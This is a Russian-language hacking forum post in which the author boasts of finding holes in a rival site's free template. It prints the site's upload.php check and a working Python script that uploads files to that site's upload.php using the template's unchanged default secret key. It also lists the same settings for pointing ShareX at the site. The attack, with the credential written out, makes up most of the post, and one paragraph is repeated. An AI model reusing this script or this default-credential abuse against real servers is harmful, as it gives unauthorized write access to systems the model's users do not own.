EFI_COMPROMISED_DATA
-
Автор темы
- #1
кароче ебать сидели мы в войсе, вижу я такой на юг апается тема с даркваре.мл, давайте сливать дырочки сайтика
парни наши юзают фри шаблон из этой темы, что их и погубило так сказать
ну я кароче скачал, почекал файлы, нашел парочку дырок ну и файлик, который называется "upload.php"
что из себя представляет файл "upload.php"?
-Скрипт, на который отправляются запросы для заливания картиночек. В файле проверяется секрет пасс, но там его не сменили, поэтому мы юзаем деф
интересующая нас часть в файле
После я составил литл скрипт на аплоад фоточек
Ну и теперь мы можем просто настроить тот же ShareX, как указано в коде на такие параметры
парни наши юзают фри шаблон из этой темы, что их и погубило так сказать
ну я кароче скачал, почекал файлы, нашел парочку дырок ну и файлик, который называется "upload.php"
что из себя представляет файл "upload.php"?
-Скрипт, на который отправляются запросы для заливания картиночек. В файле проверяется секрет пасс, но там его не сменили, поэтому мы юзаем деф
интересующая нас часть в файле
PHP:
$allowedTypes = array('image/png', 'image/jpeg');//, 'image/gif', 'video/webm');
if ( ! isset($_POST['secret']) || $_POST['secret'] !== PASSKEY) {
die('error,e-401');
}
if ( ! (filesize($_FILES['sharex']['tmp_name']) > 0 && in_array($_FILES['sharex']['type'], $allowedTypes))) {
die('error,e-415');
}
if ($_FILES['sharex']['error'] > 0) {
die('error,e-500');
}
Python:
import requests
files = [('sharex', ('es3n1n.png', open('C:\\Users\\me\\Desktop\\photo_2018-12-30_01-42-55.jpg', 'rb'), 'image/png'))]
data = {'secret' : "zPQ6uinI0usDn3YfiIftLPZYeqT1Tw"}
r = requests.post("https://darkware.ml/upload.php", data=data, files=files)
print(r.content)
url https://darkware.ml/upload.php
аргументы: secret: "zPQ6uinI0usDn3YfiIftLPZYeqT1Tw"
имя формы sharex